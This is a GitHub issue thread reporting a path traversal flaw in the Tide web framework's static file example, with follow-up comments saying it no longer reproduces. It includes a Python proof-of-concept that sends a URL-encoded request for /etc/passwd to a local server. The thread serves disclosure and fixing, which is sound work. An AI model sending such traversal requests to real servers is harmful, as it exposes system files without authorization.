### ISSUE TITLE
Static file example allows traversal outside static file root

### ISSUE THREAD

**Issue by rvolgers** [http-rs/tide#268]
#### Current Behavior

The static file server example is flawed in a way that will allow access to all files on the system.

#### Code/Gist

```
cargo +nightly run --example staticfile
```

Then run this Python script:
```python
#!/usr/bin/env python3
import socket

s = socket.create_connection(('127.0.0.1', 8000))

s.sendall(b'GET /%2fetc%2fpasswd HTTP/1.0\r\nHost: localhost\r\n\r\n')

data = b''
while True:
    tmp = s.recv(1024)
    if not tmp: break
    data += tmp

print(data.decode('utf8'))
```

#### Expected behavior/code

I expected an HTTP 404 error instead of my `/etc/passwd` file.

#### Environment

Linux (but almost certainly affects Windows as well)

#### Possible Solution

Do what the Iron example does and urldecode it before parsing. Alternatively, check that each path component still consists of only a single normal path element after decoding.

In the long run a URL-specific pathbuf variant is probably the proper solution, but is not needed to fix the problem here.

#### Additional context/Screenshots

Reporting this in public because it's just an example and Tide is not marked as ready for production use. Still, it should be fixed as example code ends up being copy/pasted around for a long time.

**Comment by tomhoule** [comment]
I am not completely clear on the interaction with URL encoding, but there was an attempt to protect against this in [tide-static-files](https://github.com/tomhoule/tide-static-files/blob/master/src/lib.rs#L79). I hope I can find the time to see how this can be contributed to tide soon.

**Comment by PeteJodo** [comment]
looks like this issue no longer applies

```sh
[2020-04-23T03:17:55Z WARN  tide::server::serve_dir] File not found: "/path/to/project/src/%2fetc%2fpasswd"
```
